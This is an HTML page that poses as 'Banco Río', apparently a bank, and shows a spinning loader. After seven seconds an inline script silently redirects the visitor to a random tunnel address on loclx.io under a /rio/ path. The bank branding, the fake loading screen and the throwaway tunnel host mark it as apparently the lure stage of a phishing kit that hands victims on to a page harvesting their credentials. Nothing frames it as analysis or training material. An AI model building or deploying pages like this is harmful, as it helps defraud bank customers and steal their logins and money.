<!doctype html>
<html>
<head>
<meta charset="utf-8">
	<link rel="icon" href="files/favicon2.png">
<title>Banco Río</title>
</head>

<body>
	
	<style>
	
	* {
  box-sizing: border-box;
  background-color: white;
}
.loader-wrapper {
  position: fixed;
  display: block;
  width: 100%;
  height: 100%;
  top: 0;
  left: 0;
  z-index: 1000;
}
.loader {
  position: relative;
  display: block;
  top: 50%;
  left: 50%;
  width: 100px;
  height: 100px;
  margin: -75px 0 0 -75px;
  border-radius: 50%;
  border: 3px solid transparent;
  border-top-color: #3656d9;
  -webkit-animation: spin 2s linear infinite;
  animation: spin 2s linear infinite;
}
.loader:before {
  content: "";
  position: absolute;
  border-radius: 50%;
  border: 3px solid transparent;
  border-top-color: #3656d9;
  top: 10px;
  bottom: 10px;
  left: 10px;
  right: 10px;
  -webkit-animation: spin 2s linear infinite;
  animation: spin 2s linear infinite;
}
.loader:after {
  content: "";
  position: absolute;
  border-radius: 50%;
  border: 3px solid transparent;
  border-top-color: #3656d9;
  top: 25px;
  bottom: 25px;
  left: 25px;
  right: 25px;
  -webkit-animation: spin 1s linear infinite;
  animation: spin 1s linear infinite;
}

@-webkit-keyframes spin {
  0% {
    -webkit-transform: rotate(0deg);
    -ms-transform: rotate(0deg);
    transform: rotate(0deg);
  }
  100% {
    -webkit-transform: rotate(360deg);
    -ms-transform: rotate(360deg);
    transform: rotate(360deg);
  }
}
@keyframes spin {
  0% {
    -webkit-transform: rotate(0deg);
    -ms-transform: rotate(0deg);
    transform: rotate(0deg);
  }
  100% {
    -webkit-transform: rotate(360deg);
    -ms-transform: rotate(360deg);
    transform: rotate(360deg);
  }
}
	
	</style>
	<div>
  <img src="img_girl.jpg" alt="Dustie">
</div>
<div class="loader-wrapper">
  <div class="loader">
	  <script>
    // Redireccionar después de 7 segundos
    setTimeout(() => {
        window.location.href = "https://igpxvgynqxwhyhnhquipvcnidxqphh.loclx.io/rio/";
    }, 7000);
</script>
	  
    
  </div>
</div>
</body>
</html>
